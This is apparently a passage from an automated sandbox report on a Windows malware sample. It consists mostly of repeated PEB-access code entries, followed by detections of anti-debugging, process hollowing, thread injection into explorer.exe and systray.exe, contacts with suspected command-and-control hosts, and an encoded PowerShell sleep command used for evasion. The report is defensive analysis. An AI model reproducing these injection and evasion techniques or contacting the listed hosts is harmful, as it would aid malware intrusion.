          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01794BAD mov eax, dword ptr fs:[00000030h]3_2_01794BAD
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01794BAD mov eax, dword ptr fs:[00000030h]3_2_01794BAD
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01794BAD mov eax, dword ptr fs:[00000030h]3_2_01794BAD
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01838B58 mov eax, dword ptr fs:[00000030h]3_2_01838B58
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179B390 mov eax, dword ptr fs:[00000030h]3_2_0179B390
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792397 mov eax, dword ptr fs:[00000030h]3_2_01792397
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01771B8F mov eax, dword ptr fs:[00000030h]3_2_01771B8F
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01771B8F mov eax, dword ptr fs:[00000030h]3_2_01771B8F
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A927A mov eax, dword ptr fs:[00000030h]3_2_017A927A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017F4257 mov eax, dword ptr fs:[00000030h]3_2_017F4257
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01769240 mov eax, dword ptr fs:[00000030h]3_2_01769240
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01769240 mov eax, dword ptr fs:[00000030h]3_2_01769240
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01769240 mov eax, dword ptr fs:[00000030h]3_2_01769240
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01769240 mov eax, dword ptr fs:[00000030h]3_2_01769240
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A4A2C mov eax, dword ptr fs:[00000030h]3_2_017A4A2C
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A4A2C mov eax, dword ptr fs:[00000030h]3_2_017A4A2C
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176AA16 mov eax, dword ptr fs:[00000030h]3_2_0176AA16
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176AA16 mov eax, dword ptr fs:[00000030h]3_2_0176AA16
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01783A1C mov eax, dword ptr fs:[00000030h]3_2_01783A1C
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01765210 mov eax, dword ptr fs:[00000030h]3_2_01765210
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01765210 mov ecx, dword ptr fs:[00000030h]3_2_01765210
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01765210 mov eax, dword ptr fs:[00000030h]3_2_01765210
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01765210 mov eax, dword ptr fs:[00000030h]3_2_01765210
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01778A0A mov eax, dword ptr fs:[00000030h]3_2_01778A0A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182AA16 mov eax, dword ptr fs:[00000030h]3_2_0182AA16
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182AA16 mov eax, dword ptr fs:[00000030h]3_2_0182AA16
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792AE4 mov eax, dword ptr fs:[00000030h]3_2_01792AE4
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792ACB mov eax, dword ptr fs:[00000030h]3_2_01792ACB
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177AAB0 mov eax, dword ptr fs:[00000030h]3_2_0177AAB0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177AAB0 mov eax, dword ptr fs:[00000030h]3_2_0177AAB0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179FAB0 mov eax, dword ptr fs:[00000030h]3_2_0179FAB0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h]3_2_017652A5
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h]3_2_017652A5
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h]3_2_017652A5
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h]3_2_017652A5
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h]3_2_017652A5
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182EA55 mov eax, dword ptr fs:[00000030h]3_2_0182EA55
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0181B260 mov eax, dword ptr fs:[00000030h]3_2_0181B260
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0181B260 mov eax, dword ptr fs:[00000030h]3_2_0181B260
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01838A62 mov eax, dword ptr fs:[00000030h]3_2_01838A62
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179D294 mov eax, dword ptr fs:[00000030h]3_2_0179D294
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179D294 mov eax, dword ptr fs:[00000030h]3_2_0179D294
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178C577 mov eax, dword ptr fs:[00000030h]3_2_0178C577
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178C577 mov eax, dword ptr fs:[00000030h]3_2_0178C577
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01787D50 mov eax, dword ptr fs:[00000030h]3_2_01787D50
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_018305AC mov eax, dword ptr fs:[00000030h]3_2_018305AC
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_018305AC mov eax, dword ptr fs:[00000030h]3_2_018305AC
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A3D43 mov eax, dword ptr fs:[00000030h]3_2_017A3D43
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E3540 mov eax, dword ptr fs:[00000030h]3_2_017E3540
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01794D3B mov eax, dword ptr fs:[00000030h]3_2_01794D3B
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01794D3B mov eax, dword ptr fs:[00000030h]3_2_01794D3B
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01794D3B mov eax, dword ptr fs:[00000030h]3_2_01794D3B
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176AD30 mov eax, dword ptr fs:[00000030h]3_2_0176AD30
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017EA537 mov eax, dword ptr fs:[00000030h]3_2_017EA537
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h]3_2_0182FDE2
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h]3_2_0182FDE2
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h]3_2_0182FDE2
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h]3_2_0182FDE2
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01818DF1 mov eax, dword ptr fs:[00000030h]3_2_01818DF1
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177D5E0 mov eax, dword ptr fs:[00000030h]3_2_0177D5E0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177D5E0 mov eax, dword ptr fs:[00000030h]3_2_0177D5E0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01838D34 mov eax, dword ptr fs:[00000030h]3_2_01838D34
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]3_2_017E6DC9
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]3_2_017E6DC9
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]3_2_017E6DC9
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov ecx, dword ptr fs:[00000030h]3_2_017E6DC9
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]3_2_017E6DC9
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]3_2_017E6DC9
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182E539 mov eax, dword ptr fs:[00000030h]3_2_0182E539
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h]3_2_01791DB5
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h]3_2_01791DB5
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h]3_2_01791DB5
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017935A1 mov eax, dword ptr fs:[00000030h]3_2_017935A1
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179FD9B mov eax, dword ptr fs:[00000030h]3_2_0179FD9B
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179FD9B mov eax, dword ptr fs:[00000030h]3_2_0179FD9B
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792581 mov eax, dword ptr fs:[00000030h]3_2_01792581
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792581 mov eax, dword ptr fs:[00000030h]3_2_01792581
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792581 mov eax, dword ptr fs:[00000030h]3_2_01792581
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792581 mov eax, dword ptr fs:[00000030h]3_2_01792581
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]3_2_01762D8A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]3_2_01762D8A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]3_2_01762D8A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]3_2_01762D8A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]3_2_01762D8A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178746D mov eax, dword ptr fs:[00000030h]3_2_0178746D
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FC450 mov eax, dword ptr fs:[00000030h]3_2_017FC450
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FC450 mov eax, dword ptr fs:[00000030h]3_2_017FC450
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A44B mov eax, dword ptr fs:[00000030h]3_2_0179A44B
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01838CD6 mov eax, dword ptr fs:[00000030h]3_2_01838CD6
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179BC2C mov eax, dword ptr fs:[00000030h]3_2_0179BC2C
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h]3_2_017E6C0A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h]3_2_017E6C0A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h]3_2_017E6C0A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h]3_2_017E6C0A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_018214FB mov eax, dword ptr fs:[00000030h]3_2_018214FB
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]3_2_01821C06
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]3_2_01821C06
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]3_2_01821C06
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]3_2_01821C06
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]3_2_01821C06
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]3_2_01821C06
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]3_2_01821C06
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]3_2_01821C06
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]3_2_01821C06
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]3_2_01821C06
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]3_2_01821C06
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]3_2_01821C06
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]3_2_01821C06
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]3_2_01821C06
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183740D mov eax, dword ptr fs:[00000030h]3_2_0183740D
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183740D mov eax, dword ptr fs:[00000030h]3_2_0183740D
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183740D mov eax, dword ptr fs:[00000030h]3_2_0183740D
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6CF0 mov eax, dword ptr fs:[00000030h]3_2_017E6CF0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6CF0 mov eax, dword ptr fs:[00000030h]3_2_017E6CF0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6CF0 mov eax, dword ptr fs:[00000030h]3_2_017E6CF0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177849B mov eax, dword ptr fs:[00000030h]3_2_0177849B
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177FF60 mov eax, dword ptr fs:[00000030h]3_2_0177FF60
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177EF40 mov eax, dword ptr fs:[00000030h]3_2_0177EF40
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179E730 mov eax, dword ptr fs:[00000030h]3_2_0179E730
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01764F2E mov eax, dword ptr fs:[00000030h]3_2_01764F2E
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01764F2E mov eax, dword ptr fs:[00000030h]3_2_01764F2E
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178F716 mov eax, dword ptr fs:[00000030h]3_2_0178F716
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FFF10 mov eax, dword ptr fs:[00000030h]3_2_017FFF10
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FFF10 mov eax, dword ptr fs:[00000030h]3_2_017FFF10
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A70E mov eax, dword ptr fs:[00000030h]3_2_0179A70E
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A70E mov eax, dword ptr fs:[00000030h]3_2_0179A70E
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183070D mov eax, dword ptr fs:[00000030h]3_2_0183070D
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183070D mov eax, dword ptr fs:[00000030h]3_2_0183070D
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A37F5 mov eax, dword ptr fs:[00000030h]3_2_017A37F5
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01778794 mov eax, dword ptr fs:[00000030h]3_2_01778794
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01838F6A mov eax, dword ptr fs:[00000030h]3_2_01838F6A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E7794 mov eax, dword ptr fs:[00000030h]3_2_017E7794
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E7794 mov eax, dword ptr fs:[00000030h]3_2_017E7794
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E7794 mov eax, dword ptr fs:[00000030h]3_2_017E7794
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h]3_2_0178AE73
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h]3_2_0178AE73
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h]3_2_0178AE73
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h]3_2_0178AE73
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h]3_2_0178AE73
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177766D mov eax, dword ptr fs:[00000030h]3_2_0177766D
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01830EA5 mov eax, dword ptr fs:[00000030h]3_2_01830EA5
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01830EA5 mov eax, dword ptr fs:[00000030h]3_2_01830EA5
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01830EA5 mov eax, dword ptr fs:[00000030h]3_2_01830EA5
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]3_2_01777E41
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]3_2_01777E41
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]3_2_01777E41
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]3_2_01777E41
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]3_2_01777E41
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]3_2_01777E41
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0181FEC0 mov eax, dword ptr fs:[00000030h]3_2_0181FEC0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01838ED6 mov eax, dword ptr fs:[00000030h]3_2_01838ED6
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176E620 mov eax, dword ptr fs:[00000030h]3_2_0176E620
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A61C mov eax, dword ptr fs:[00000030h]3_2_0179A61C
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A61C mov eax, dword ptr fs:[00000030h]3_2_0179A61C
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176C600 mov eax, dword ptr fs:[00000030h]3_2_0176C600
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176C600 mov eax, dword ptr fs:[00000030h]3_2_0176C600
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176C600 mov eax, dword ptr fs:[00000030h]3_2_0176C600
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01798E00 mov eax, dword ptr fs:[00000030h]3_2_01798E00
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821608 mov eax, dword ptr fs:[00000030h]3_2_01821608
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017776E2 mov eax, dword ptr fs:[00000030h]3_2_017776E2
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017916E0 mov ecx, dword ptr fs:[00000030h]3_2_017916E0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017936CC mov eax, dword ptr fs:[00000030h]3_2_017936CC
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A8EC7 mov eax, dword ptr fs:[00000030h]3_2_017A8EC7
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0181FE3F mov eax, dword ptr fs:[00000030h]3_2_0181FE3F
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182AE44 mov eax, dword ptr fs:[00000030h]3_2_0182AE44
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182AE44 mov eax, dword ptr fs:[00000030h]3_2_0182AE44
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E46A7 mov eax, dword ptr fs:[00000030h]3_2_017E46A7
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FFE87 mov eax, dword ptr fs:[00000030h]3_2_017FFE87
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0040CEC3 LdrLoadDll,3_2_0040CEC3
          Source: C:\Users\user\Desktop\SC_0017384.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 54.85.86.211 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.myprojoints.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.152.24 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.131 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.229 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.metatv.app
          Source: C:\Windows\explorer.exeDomain query: www.findmyoriginstory.com
          Source: C:\Windows\explorer.exeDomain query: www.brunaeleandro.com
          Source: C:\Windows\explorer.exeDomain query: www.madisoncountylincoln.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.194.225 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.emprendizajesocial.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\SC_0017384.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: EA0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\SC_0017384.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Encrypted powershell cmdline option found
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess created: Base64 decoded start-sleep -seconds 20
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: Base64 decoded start-sleep -seconds 20
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: Base64 decoded start-sleep -seconds 20
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: Base64 decoded start-sleep -seconds 20
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\SC_0017384.exeMemory written: C:\Users\user\Desktop\SC_0017384.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeMemory written: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeMemory written: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\SC_0017384.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\SC_0017384.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
